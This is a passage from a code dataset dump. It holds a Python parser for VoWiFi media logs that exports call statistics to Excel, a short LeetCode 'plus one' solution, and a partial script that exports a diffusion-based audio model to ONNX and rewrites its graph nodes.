prefix + '_' +self.logger.timestamp +'_media.log'\r\n with open(self.trimlog, 'a+')as trimlog:\r\n trimlog.truncate()\r\n\r\n self.excel = self.outdir + '/' + prefix + '_' +self.logger.timestamp +'_statictics.xlsx'\r\n\r\n #final eventmsg should be processed\r\n self.eventmsgs = list()\r\n\r\n #pid should be a verbose list\r\n self.pids = list()\r\n\r\n #call list\r\n self.calllist = list()\r\n\r\n #call number\r\n self.callnum = 0\r\n\r\n #Do we really need this F*cking global flag\r\n self.incall = False\r\n self.curcall = None\r\n\r\n def findPid(self):\r\n '''\r\n description: process may restart, so pid is a list\r\n :return:\r\n '''\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n #start to find pid\r\n for index, process in enumerate(ProcessList):\r\n key = process.getkey()\r\n name = process.getname()\r\n plist = process.getpidlist()\r\n if pid not in self.pids and self.logutils.patterninline(key, line):\r\n self.logger.logger.info('found id ' + str(pid) + ' for ' + name)\r\n self.pids.append(pid)\r\n plist.append(pid)\r\n\r\n\r\n def parse(self):\r\n '''\r\n 1. pass pid lines\r\n 2. pattern match\r\n 3. pattern handler\r\n 4. draw the graph, csv,\r\n :return:\r\n '''\r\n #find all pids\r\n self.findPid()\r\n\r\n #handle each patten by pid\r\n for index, line in enumerate(self.loglines):\r\n fields = line.split()\r\n fruit = self.logutils.findfields(fields)\r\n pid = fruit['pid']\r\n for index, process in enumerate(ProcessList):\r\n plist = process.getpidlist()\r\n pevent = process.getpevent()\r\n if pid in plist:\r\n #then we handle the event\r\n elist = pevent.geteventlist()\r\n for eindex, event in enumerate(elist):\r\n key = event['key']\r\n groupnum = event['groupnum']\r\n color = event['color']\r\n eventHandler = event['eventHandler']\r\n\r\n regex = re.compile(key)\r\n result = regex.search(line)\r\n if result:\r\n #redirect output\r\n with open(self.trimlog, 'a+') as trimlog:\r\n trimlog.write(line)\r\n\r\n #start to handle event, pass the mflow instance\r\n handlerobj = eventHandler(result, color, groupnum, mflow=self, fruit=fruit)\r\n eventdict = handlerobj.getret()\r\n\r\n def dumpcalllist(self):\r\n self.logger.logger.info('Totally Call number is ' + str(self.callnum))\r\n for cindex, call in enumerate(self.calllist):\r\n call.dumpcall()\r\n\r\n def gensummarysheet(self,sheet):\r\n # gen header\r\n sheet.title = \"Summary\"\r\n #header = ['No.', 'Codec', 'CVO/id', 'fps', 'Resolution', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n header = ['No.', 'Codec', 'CVO/id', 'start', 'end', 'duration', 'first sps', 'first pps']\r\n sheet.append(header)\r\n for cindex, call in enumerate(self.calllist):\r\n onerow = list()\r\n onerow.append(cindex+1)\r\n # add codec info\r\n onerow.append(call.codec['name'] +'/' + call.codec['payload'])\r\n onerow.append(call.codec['cvo'] + '/' + call.codec['cvoid'])\r\n #onerow.append(call.camerainfo['minfps'] + '->' + call.camerainfo['maxfps'])\r\n #onerow.append(call.camerainfo['width'] + 'x' + call.camerainfo['height'])\r\n\r\n onerow.append(call.time['start'])\r\n onerow.append(call.time['end'])\r\n onerow.append(call.time['duration'])\r\n onerow.append(call.time['firstpps'])\r\n onerow.append(call.time['firstsps'])\r\n sheet.append(onerow)\r\n adjuctcolumnsize(sheet)\r\n\r\n def exportexcel(self):\r\n # generate sheet named by VT_Call_number_sendstat/recvstat\r\n wb = Workbook()\r\n self.gensummarysheet(wb.active)\r\n\r\n # the first sheet is always sendstat of call 1\r\n for cindex, call in enumerate(self.calllist):\r\n #one call will have two sheets: send, recv\r\n realindex = cindex + 1\r\n self.logger.logger.info('start to handle call ' + str(realindex))\r\n\r\n firstws = wb.create_sheet(title=call.sendsheettitle(realindex))\r\n secondws = wb.create_sheet(title=call.recvsheettitle(realindex))\r\n\r\n call.gensendsheet(firstws)\r\n adjuctcolumnsize(firstws)\r\n\r\n call.genrecvsheet(secondws)\r\n adjuctcolumnsize(secondws)\r\n\r\n wb.save(self.excel)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #mflow = mflow(logname=\"./samplelog/main.log\")\r\n mflow = mflow(logname=\"./samplelog/751978/mo.log\")\r\n mflow.parse()\r\n mflow.dumpcalllist()\r\n mflow.exportexcel()\r\n pass\r\n","repo_name":"deevarvar/myLab","sub_path":"sprd/vowifi/mengine_parser/mflow_parser.py","file_name":"mflow_parser.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1840038200","text":"def plusOne(digits):\n if digits[0] == 9:\n digits.insert(0, 0)\n for i in range(len(digits)-1, -1, -1):\n if digits[i] != 9:\n digits[i] += 1\n break\n else:\n digits[i] = 0\n if digits[0] == 0:\n digits.remove(0)\n return digits\n\n\ndigits = [9, 9, 9]\nprint(plusOne(digits))\n\ndigits2 = [9,8,7,6,5,4,3,2,1,0]\nprint(plusOne(digits2))","repo_name":"morozooff/leetCode-solutions","sub_path":"easy/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11384117849","text":"import os\nimport sys\n\n\nroot_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['PYTHONPATH'] = f'\"{root_dir}\"'\nsys.path.insert(0, root_dir)\n\n\nimport argparse\nimport math\nimport re\nimport struct\nfrom functools import partial\n\nimport numpy as np\nimport onnx\nimport onnxsim\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nfrom torch.nn import Linear\n\nfrom modules.commons.common_layers import Mish\nfrom src.diff.net import AttrDict\nfrom utils import load_ckpt\nfrom utils.hparams import hparams, set_hparams\n\n\ndef extract(a, t):\n return a[t].reshape((1, 1, 1, 1))\n\n\ndef linear_beta_schedule(timesteps, max_beta=hparams.get('max_beta', 0.01)):\n \"\"\"\n linear schedule\n \"\"\"\n betas = np.linspace(1e-4, max_beta, timesteps)\n return betas\n\n\ndef cosine_beta_schedule(timesteps, s=0.008):\n \"\"\"\n cosine schedule\n as proposed in https://openreview.net/forum?id=-NEXDKk8gZ\n \"\"\"\n steps = timesteps + 1\n x = np.linspace(0, steps, steps)\n alphas_cumprod = np.cos(((x / steps) + s) / (1 + s) * np.pi * 0.5) ** 2\n alphas_cumprod = alphas_cumprod / alphas_cumprod[0]\n betas = 1 - (alphas_cumprod[1:] / alphas_cumprod[:-1])\n return np.clip(betas, a_min=0, a_max=0.999)\n\n\nbeta_schedule = {\n \"cosine\": cosine_beta_schedule,\n \"linear\": linear_beta_schedule,\n}\n\n\nclass SinusoidalPosEmb(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n half_dim = dim // 2\n emb = math.log(10000) / (half_dim - 1)\n self.register_buffer('emb', torch.exp(torch.arange(half_dim) * torch.tensor(-emb)).unsqueeze(0))\n\n def forward(self, x):\n emb = self.emb * x\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb\n\n\nclass KaimingNormalConv1d(nn.Conv1d):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n nn.init.kaiming_normal_(self.weight)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, encoder_hidden, residual_channels, dilation):\n super().__init__()\n self.residual_channels = residual_channels\n self.dilated_conv = KaimingNormalConv1d(\n residual_channels,\n 2 * residual_channels,\n 3,\n padding=dilation,\n dilation=dilation)\n self.diffusion_projection = Linear(residual_channels, residual_channels)\n self.conditioner_projection = KaimingNormalConv1d(encoder_hidden, 2 * residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(residual_channels, 2 * residual_channels, 1)\n\n def forward(self, x, conditioner, diffusion_step):\n diffusion_step = self.diffusion_projection(diffusion_step).unsqueeze(-1)\n conditioner = self.conditioner_projection(conditioner)\n y = x + diffusion_step\n\n y = self.dilated_conv(y) + conditioner\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n gate, filter = torch.split(y, [self.residual_channels, self.residual_channels], dim=1)\n\n y = torch.sigmoid(gate) * torch.tanh(filter)\n y = self.output_projection(y)\n\n # Using torch.split instead of torch.chunk to avoid using onnx::Slice\n residual, skip = torch.split(y, [self.residual_channels, self.residual_channels], dim=1)\n\n return (x + residual) / math.sqrt(2.0), skip\n\n\nclass DiffNet(nn.Module):\n def __init__(self, in_dims=80):\n super().__init__()\n self.params = params = AttrDict(\n # Model params\n encoder_hidden=hparams['hidden_size'],\n residual_layers=hparams['residual_layers'],\n residual_channels=hparams['residual_channels'],\n dilation_cycle_length=hparams['dilation_cycle_length'],\n )\n self.input_projection = KaimingNormalConv1d(in_dims, params.residual_channels, 1)\n self.diffusion_embedding = SinusoidalPosEmb(params.residual_channels)\n dim = params.residual_channels\n self.mlp = nn.Sequential(\n nn.Linear(dim, dim * 4),\n Mish(),\n nn.Linear(dim * 4, dim)\n )\n self.residual_layers = nn.ModuleList([\n ResidualBlock(params.encoder_hidden, params.residual_channels, 2 ** (i % params.dilation_cycle_length))\n for i in range(params.residual_layers)\n ])\n self.skip_projection = KaimingNormalConv1d(params.residual_channels, params.residual_channels, 1)\n self.output_projection = KaimingNormalConv1d(params.residual_channels, in_dims, 1)\n nn.init.zeros_(self.output_projection.weight)\n\n # TODO: swap order of `diffusion_steps` and `cond`\n def forward(self, spec, diffusion_step, cond):\n \"\"\"\n\n :param spec: [B, 1, M, T]\n :param diffusion_step: [B, 1]\n :param cond: [B, M, T]\n :return:\n \"\"\"\n x = spec.squeeze(1)\n x = self.input_projection(x) # [B, residual_channel, T]\n\n x = functional.relu(x)\n diffusion_step = diffusion_step.float()\n diffusion_step = self.diffusion_embedding(diffusion_step)\n diffusion_step = self.mlp(diffusion_step)\n\n # Avoid ConstantOfShape op\n x, skip = self.residual_layers[0](x, cond, diffusion_step)\n # noinspection PyTypeChecker\n for layer in self.residual_layers[1:]:\n x, skip_connection = layer.forward(x, cond, diffusion_step)\n skip += skip_connection\n\n x = skip / math.sqrt(len(self.residual_layers))\n\n x = self.skip_projection(x)\n x = functional.relu(x)\n x = self.output_projection(x) # [B, mel_bins, T]\n return x.unsqueeze(1)\n\n\nclass NaiveNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('clip_min', to_torch(-1.))\n self.register_buffer('clip_max', to_torch(1.))\n\n def forward(self, x, noise_pred, t):\n x_recon = (\n extract(self.sqrt_recip_alphas_cumprod, t) * x -\n extract(self.sqrt_recipm1_alphas_cumprod, t) * noise_pred\n )\n x_recon = torch.clamp(x_recon, min=self.clip_min, max=self.clip_max)\n\n model_mean = (\n extract(self.posterior_mean_coef1, t) * x_recon +\n extract(self.posterior_mean_coef2, t) * x\n )\n model_log_variance = extract(self.posterior_log_variance_clipped, t)\n noise = torch.randn_like(x)\n # no noise when t == 0\n nonzero_mask = ((t > 0).float()).reshape(1, 1, 1, 1)\n return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise\n\n\nclass PLMSNoisePredictor(nn.Module):\n def __init__(self):\n super().__init__()\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n # Below are buffers for TorchScript to pass jit compilation.\n self.register_buffer('_1', to_torch(1))\n self.register_buffer('_2', to_torch(2))\n self.register_buffer('_3', to_torch(3))\n self.register_buffer('_5', to_torch(5))\n self.register_buffer('_9', to_torch(9))\n self.register_buffer('_12', to_torch(12))\n self.register_buffer('_16', to_torch(16))\n self.register_buffer('_23', to_torch(23))\n self.register_buffer('_24', to_torch(24))\n self.register_buffer('_37', to_torch(37))\n self.register_buffer('_55', to_torch(55))\n self.register_buffer('_59', to_torch(59))\n\n def forward(self, x, noise_t, t, t_prev):\n a_t = extract(self.alphas_cumprod, t)\n a_prev = extract(self.alphas_cumprod, t_prev)\n a_t_sq, a_prev_sq = a_t.sqrt(), a_prev.sqrt()\n\n x_delta = (a_prev - a_t) * ((self._1 / (a_t_sq * (a_t_sq + a_prev_sq))) * x - self._1 / (\n a_t_sq * (((self._1 - a_prev) * a_t).sqrt() + ((self._1 - a_t) * a_prev).sqrt())) * noise_t)\n x_pred = x + x_delta\n\n return x_pred\n\n def predict_stage0(self, noise_pred, noise_pred_prev):\n return (noise_pred\n + noise_pred_prev) / self._2\n\n def predict_stage1(self, noise_pred, noise_list):\n return (noise_pred * self._3\n - noise_list[-1]) / self._2\n\n def predict_stage2(self, noise_pred, noise_list):\n return (noise_pred * self._23\n - noise_list[-1] * self._16\n + noise_list[-2] * self._5) / self._12\n\n def predict_stage3(self, noise_pred, noise_list):\n return (noise_pred * self._55\n - noise_list[-1] * self._59\n + noise_list[-2] * self._37\n - noise_list[-3] * self._9) / self._24\n\n\nclass MelExtractor(nn.Module):\n def __init__(self, spec_min, spec_max, keep_bins):\n super().__init__()\n\n def forward(self, x):\n x = x.squeeze(1).permute(0, 2, 1)\n d = (self.spec_max - self.spec_min) / 2\n m = (self.spec_max + self.spec_min) / 2\n return x * d + m\n\n\nclass GaussianDiffusion(nn.Module):\n def __init__(self, out_dims, timesteps=1000, k_step=1000, spec_min=None, spec_max=None):\n super().__init__()\n self.mel_bins = out_dims\n self.K_step = k_step\n\n self.denoise_fn = DiffNet(out_dims)\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n if 'schedule_type' in hparams.keys():\n betas = beta_schedule[hparams['schedule_type']](timesteps)\n else:\n betas = cosine_beta_schedule(timesteps)\n\n # Below are buffers for state_dict to load into.\n alphas = 1. - betas\n alphas_cumprod = np.cumprod(alphas, axis=0)\n alphas_cumprod_prev = np.append(1., alphas_cumprod[:-1])\n\n timesteps, = betas.shape\n self.num_timesteps = int(timesteps)\n\n to_torch = partial(torch.tensor, dtype=torch.float32)\n\n self.register_buffer('alphas_cumprod', to_torch(alphas_cumprod))\n\n # calculations for diffusion q(x_t | x_{t-1}) and others\n self.register_buffer('sqrt_recip_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod)))\n self.register_buffer('sqrt_recipm1_alphas_cumprod', to_torch(np.sqrt(1. / alphas_cumprod - 1)))\n\n # calculations for posterior q(x_{t-1} | x_t, x_0)\n posterior_variance = betas * (1. - alphas_cumprod_prev) / (1. - alphas_cumprod)\n # above: equal to 1. / (1. / (1. - alpha_cumprod_tm1) + alpha_t / beta_t)\n # below: log calculation clipped because the posterior variance is 0 at the beginning of the diffusion chain\n self.register_buffer('posterior_log_variance_clipped', to_torch(np.log(np.maximum(posterior_variance, 1e-20))))\n self.register_buffer('posterior_mean_coef1', to_torch(\n betas * np.sqrt(alphas_cumprod_prev) / (1. - alphas_cumprod)))\n self.register_buffer('posterior_mean_coef2', to_torch(\n (1. - alphas_cumprod_prev) * np.sqrt(alphas) / (1. - alphas_cumprod)))\n\n self.register_buffer('spec_min', torch.FloatTensor(spec_min)[None, None, :hparams['keep_bins']])\n self.register_buffer('spec_max', torch.FloatTensor(spec_max)[None, None, :hparams['keep_bins']])\n\n self.naive_noise_predictor = NaiveNoisePredictor()\n self.plms_noise_predictor = PLMSNoisePredictor()\n self.mel_extractor = MelExtractor(spec_min=spec_min, spec_max=spec_max, keep_bins=hparams['keep_bins'])\n\n def build_submodules(self):\n # Move registered buffers into submodules after loading state dict.\n self.naive_noise_predictor.register_buffer('sqrt_recip_alphas_cumprod', self.sqrt_recip_alphas_cumprod)\n self.naive_noise_predictor.register_buffer('sqrt_recipm1_alphas_cumprod', self.sqrt_recipm1_alphas_cumprod)\n self.naive_noise_predictor.register_buffer(\n 'posterior_log_variance_clipped', self.posterior_log_variance_clipped)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef1', self.posterior_mean_coef1)\n self.naive_noise_predictor.register_buffer('posterior_mean_coef2', self.posterior_mean_coef2)\n self.plms_noise_predictor.register_buffer('alphas_cumprod', self.alphas_cumprod)\n self.mel_extractor.register_buffer('spec_min', self.spec_min)\n self.mel_extractor.register_buffer('spec_max', self.spec_max)\n del self.sqrt_recip_alphas_cumprod\n del self.sqrt_recipm1_alphas_cumprod\n del self.posterior_log_variance_clipped\n del self.posterior_mean_coef1\n del self.posterior_mean_coef2\n del self.alphas_cumprod\n del self.spec_min\n del self.spec_max\n\n def forward(self, condition, speedup):\n device = condition.device\n condition = condition.transpose(1, 2) # (1, n_frames, 256) => (1, 256, n_frames)\n\n n_frames = condition.shape[2]\n step_range = torch.arange(0, self.K_step, speedup, dtype=torch.long, device=device).flip(0)\n x = torch.randn((1, 1, self.mel_bins, n_frames), device=device)\n\n if speedup > 1:\n plms_noise_stage = torch.tensor(0, dtype=torch.long, device=device)\n noise_list = torch.zeros((0, 1, 1, self.mel_bins, n_frames), device=device)\n for t in step_range:\n noise_pred = self.denoise_fn(x, t, condition)\n t_prev = t - speedup\n t_prev = t_prev * (t_prev > 0)\n\n if plms_noise_stage == 0:\n x_pred = self.plms_noise_predictor(x, noise_pred, t, t_prev)\n noise_pred_prev = self.denoise_fn(x_pred, t_prev, condition)\n noise_pred_prime = self.plms_noise_predictor.predict_stage0(noise_pred, noise_pred_prev)\n elif plms_noise_stage == 1:\n noise_pred_prime = self.plms_noise_predictor.predict_stage1(noise_pred, noise_list)\n elif plms_noise_stage == 2:\n noise_pred_prime = self.plms_noise_predictor.predict_stage2(noise_pred, noise_list)\n else:\n noise_pred_prime = self.plms_noise_predictor.predict_stage3(noise_pred, noise_list)\n\n noise_pred = noise_pred.unsqueeze(0)\n if plms_noise_stage < 3:\n noise_list = torch.cat((noise_list, noise_pred), dim=0)\n plms_noise_stage = plms_noise_stage + 1\n else:\n noise_list = torch.cat((noise_list[-2:], noise_pred), dim=0)\n\n x = self.plms_noise_predictor(x, noise_pred_prime, t, t_prev)\n\n # from dpm_solver import NoiseScheduleVP, model_wrapper, DpmSolver\n # ## 1. Define the noise schedule.\n # noise_schedule = NoiseScheduleVP(betas=self.betas)\n #\n # ## 2. Convert your discrete-time `model` to the continuous-time\n # # noise prediction model. Here is an example for a diffusion model\n # ## `model` with the noise prediction type (\"noise\") .\n #\n # model_fn = model_wrapper(\n # self.denoise_fn,\n # noise_schedule,\n # model_kwargs={\"cond\": condition}\n # )\n #\n # ## 3. Define dpm-solver and sample by singlestep DPM-Solver.\n # ## (We recommend singlestep DPM-Solver for unconditional sampling)\n # ## You can adjust the `steps` to balance the computation\n # ## costs and the sample quality.\n # dpm_solver = DpmSolver(model_fn, noise_schedule)\n #\n # steps = t // hparams[\"pndm_speedup\"]\n # x = dpm_solver.sample(x, steps=steps)\n else:\n for t in step_range:\n pred = self.denoise_fn(x, t, condition)\n x = self.naive_noise_predictor(x, pred, t)\n\n mel = self.mel_extractor(x)\n return mel\n\n\nclass DiffDecoder(nn.Module):\n def __init__(self, device):\n super().__init__()\n self.model = build_model()\n self.model.eval()\n self.model.to(device)\n\n def forward(self, condition, speedup):\n mel = self.model.forward(condition, speedup) # (1, n_frames, mel_bins)\n return mel\n\n\ndef build_model():\n model = GaussianDiffusion(\n out_dims=hparams['audio_num_mel_bins'],\n timesteps=hparams['timesteps'],\n k_step=hparams['K_step'],\n spec_min=hparams['spec_min'],\n spec_max=hparams['spec_max'],\n )\n model.eval()\n load_ckpt(model, hparams['work_dir'], 'model', strict=False)\n model.build_submodules()\n return model\n\n\ndef _fix_cast_nodes(graph, logs=None):\n if logs is None:\n logs = []\n for sub_node in graph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(branch, logs)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(body, logs)\n elif sub_node.op_type == 'Cast':\n for i, sub_attr in enumerate(sub_node.attribute):\n if sub_attr.name == 'to':\n to = onnx.helper.get_attribute_value(sub_attr)\n if to == onnx.TensorProto.DOUBLE:\n float32 = onnx.helper.make_attribute('to', onnx.TensorProto.FLOAT)\n sub_node.attribute.remove(sub_attr)\n sub_node.attribute.insert(i, float32)\n logs.append(sub_node.name)\n break\n return logs\n\n\ndef _fold_shape_gather_equal_if_to_squeeze(graph, subgraph, logs=None):\n if logs is None:\n logs = []\n\n # Do folding in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, branch, logs)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, body, logs)\n\n # Do folding in current graph.\n i_shape = 0\n while i_shape < len(subgraph.node):\n if subgraph.node[i_shape].op_type == 'Shape':\n shape_node = subgraph.node[i_shape]\n shape_out = shape_node.output[0]\n i_gather = i_shape + 1\n while i_gather < len(subgraph.node):\n if subgraph.node[i_gather].op_type == 'Gather' and subgraph.node[i_gather].input[0] == shape_out:\n gather_node = subgraph.node[i_gather]\n gather_out = gather_node.output[0]\n i_equal = i_gather + 1\n while i_equal < len(subgraph.node):\n if subgraph.node[i_equal].op_type == 'Equal' and (\n subgraph.node[i_equal].input[0] == gather_out\n or subgraph.node[i_equal].input[1] == gather_out):\n equal_node = subgraph.node[i_equal]\n equal_out = equal_node.output[0]\n i_if = i_equal + 1\n while i_if < len(subgraph.node):\n if subgraph.node[i_if].op_type == 'If' and subgraph.node[i_if].input[0] == equal_out:\n # Found the substructure to be folded.\n if_node = subgraph.node[i_if]\n # Search and clean initializer values.\n squeeze_axes_tensor = None\n for tensor in subgraph.initializer:\n if tensor.name == gather_node.input[1]:\n squeeze_axes_tensor = tensor\n subgraph.initializer.remove(tensor)\n elif tensor.name == equal_node.input[1]:\n subgraph.initializer.remove(tensor)\n # Create 'Squeeze' node.\n squeeze_node = onnx.helper.make_node(\n op_type='Squeeze',\n inputs=shape_node.input,\n outputs=if_node.output\n )\n squeeze_axes = onnx.helper.make_attribute(\n key='axes',\n value=[struct.unpack('q', squeeze_axes_tensor.raw_data)[0]] # unpack int64\n )\n squeeze_node.attribute.extend([squeeze_axes])\n # Replace 'Shape', 'Gather', 'Equal', 'If' with 'Squeeze'.\n subgraph.node.insert(i_shape, squeeze_node)\n subgraph.node.remove(shape_node)\n subgraph.node.remove(gather_node)\n subgraph.node.remove(equal_node)\n subgraph.node.remove(if_node)\n logs.append((shape_node.name, gather_node.name, equal_node.name, if_node.name))\n break\n i_if += 1\n else:\n break\n i_equal += 1\n else:\n break\n i_gather += 1\n else:\n break\n i_shape += 1\n return logs\n\n\ndef _extract_conv_nodes(graph, weight_pattern, alias_prefix):\n node_dict = {} # key: pattern match, value: (alias, node)\n logs = []\n\n def _extract_conv_nodes_recursive(subgraph):\n to_be_removed = []\n for sub_node in subgraph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(branch)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(body)\n elif sub_node.op_type == 'Conv' and re.match(weight_pattern, sub_node.input[1]):\n # Found node to extract\n cached = node_dict.get(sub_node.input[1])\n if cached is None:\n out_alias = f'{alias_prefix}.{len(node_dict)}'\n node_dict[sub_node.input[1]] = (out_alias, sub_node)\n else:\n out_alias = cached[0]\n out = sub_node.output[0]\n # Search for nodes downstream the extracted node and match them to the renamed output\n for dep_node in subgraph.node:\n for dep_idx, dep_input in enumerate(dep_node.input):\n if dep_input == out:\n dep_node.input.remove(out)\n dep_node.input.insert(dep_idx, out_alias)\n # Add the node to the remove list\n to_be_removed.append(sub_node)\n logs.append(sub_node.name)\n [subgraph.node.remove(_n) for _n in to_be_removed]\n\n for i, n in enumerate(graph.node):\n if n.op_type == 'If':\n for a in n.attribute:\n b = onnx.helper.get_attribute_value(a)\n _extract_conv_nodes_recursive(b)\n for key in reversed(node_dict):\n alias, node = node_dict[key]\n # Rename output of the node\n out_name = node.output[0]\n node.output.remove(node.output[0])\n node.output.insert(0, alias)\n # Insert node into the main graph\n graph.node.insert(i, node)\n # Rename value info of the output\n for v in graph.value_info:\n if v.name == out_name:\n v.name = alias\n break\n break\n return logs\n\n\ndef _remove_unused_values(graph):\n used_values = set()\n cleaned_values = []\n\n def _record_usage_recursive(subgraph):\n for node in subgraph.node:\n # For 'If' and 'Loop' nodes, do recording recursively\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(body)\n # For each node, record its inputs and outputs\n for input_value in node.input:\n used_values.add(input_value)\n for output_value in node.output:\n used_values.add(output_value)\n\n def _clean_unused_recursively(subgraph):\n # Do cleaning in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(body)\n\n # Do cleaning in current graph.\n i = 0\n while i < len(subgraph.initializer):\n if subgraph.initializer[i].name not in used_values:\n cleaned_values.append(subgraph.initializer[i].name)\n subgraph.initializer.remove(subgraph.initializer[i])\n else:\n i += 1\n i = 0\n while i < len(subgraph.value_info):\n if subgraph.value_info[i].name not in used_values:\n cleaned_values.append(subgraph.value_info[i].name)\n subgraph.value_info.remove(subgraph.value_info[i])\n else:\n i += 1\n\n _record_usage_recursive(graph)\n _clean_unused_recursively(graph)\n return cleaned_values\n\n\ndef fix(src, target):\n model = onnx.load(src)\n\n # The output dimension are wrongly hinted by TorchScript\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n out_dims.remove(out_dims[1])\n out_dims.insert(1, in_dims[1])\n print(f'| annotate output: \\'{model.graph.output[0].name}\\'')\n\n # Fix 'Cast' nodes in sub-graphs that wrongly cast tensors to float64\n fixed_casts = _fix_cast_nodes(model.graph)\n print('| fix node(s): ')\n for i, log in enumerate(fixed_casts):\n if i == len(fixed_casts) - 1:\n end = '\\n'\n elif i % 10 == 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #1 of the simplifier to fix missing value info and type hints and remove unnecessary 'Cast'.\n print('Running ONNX simplifier...')\n model, check = onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n\n then_branch = None\n for node in model.graph.node:\n if node.op_type == 'If':\n # Add type hint to let the simplifier fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze'\n if_out = node.output[0]\n for info in model.graph.value_info:\n if info.name == if_out:\n if_out_dim = info.type.tensor_type.shape.dim\n while len(if_out_dim) > 0:\n if_out_dim.remove(if_out_dim[0])\n if_out_dim.insert(0, in_dims[0]) # batch_size\n if_out_dim.insert(1, in_dims[0]) # 1\n if_out_dim.insert(2, out_dims[2]) # mel_bins\n if_out_dim.insert(3, in_dims[1]) # n_frames\n print(f'| annotate node: \\'{node.name}\\'')\n\n # Manually fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze' in sub-graphs\n folded_groups = []\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n folded_groups += _fold_shape_gather_equal_if_to_squeeze(model.graph, branch)\n if attr.name == 'then_branch':\n # Save branch for future use\n then_branch = branch\n print('| fold node group(s): ')\n print(', '.join(['[' + ', '.join([f'\\'{n}\\'' for n in log]) + ']' for log in folded_groups]))\n break\n\n # Optimize 'Concat' nodes for shapes\n concat_node = None\n shape_prefix_name = 'noise.shape.prefix'\n list_length_name = 'list.length'\n for node in model.graph.node:\n if node.op_type == 'Concat':\n concat_node = node\n for i, ini in enumerate(model.graph.initializer):\n if ini.name == node.input[0]:\n shape_prefix = onnx.helper.make_tensor(\n name=shape_prefix_name,\n data_type=onnx.TensorProto.INT64,\n dims=(3,),\n vals=[out_dims[0].dim_value, 1, out_dims[2].dim_value]\n )\n list_length = onnx.helper.make_tensor(\n name=list_length_name,\n data_type=onnx.TensorProto.INT64,\n dims=(1,),\n vals=[0]\n )\n model.graph.initializer.extend([shape_prefix, list_length])\n break\n for i in range(3):\n node.input.remove(node.input[0])\n node.input.insert(0, shape_prefix_name)\n print(f'| optimize node: \\'{node.name}\\'')\n break\n for node in then_branch.node:\n if node.op_type == 'Concat':\n concat_inputs = list(node.input)\n dep_nodes = []\n for dep_node in then_branch.node:\n if dep_node.op_type == 'Unsqueeze' and dep_node.output[0] in concat_inputs:\n dep_nodes.append(dep_node)\n [then_branch.node.remove(d_n) for d_n in dep_nodes]\n while len(node.input) > 0:\n node.input.remove(node.input[0])\n node.input.extend([list_length_name, concat_node.output[0]])\n print(f'| optimize node: \\'{node.name}\\'')\n break\n\n # Extract 'Conv' nodes and cache results of conditioner projection\n # of each residual layer from loop bodies to improve performance.\n extracted_convs = _extract_conv_nodes(\n model.graph,\n r'model\\.denoise_fn\\.residual_layers\\.\\d+\\.conditioner_projection\\.weight',\n 'cache'\n )\n\n print(f'| extract node(s):')\n for i, log in enumerate(extracted_convs):\n if i == len(extracted_convs) - 1:\n end = '\\n'\n elif i % 10 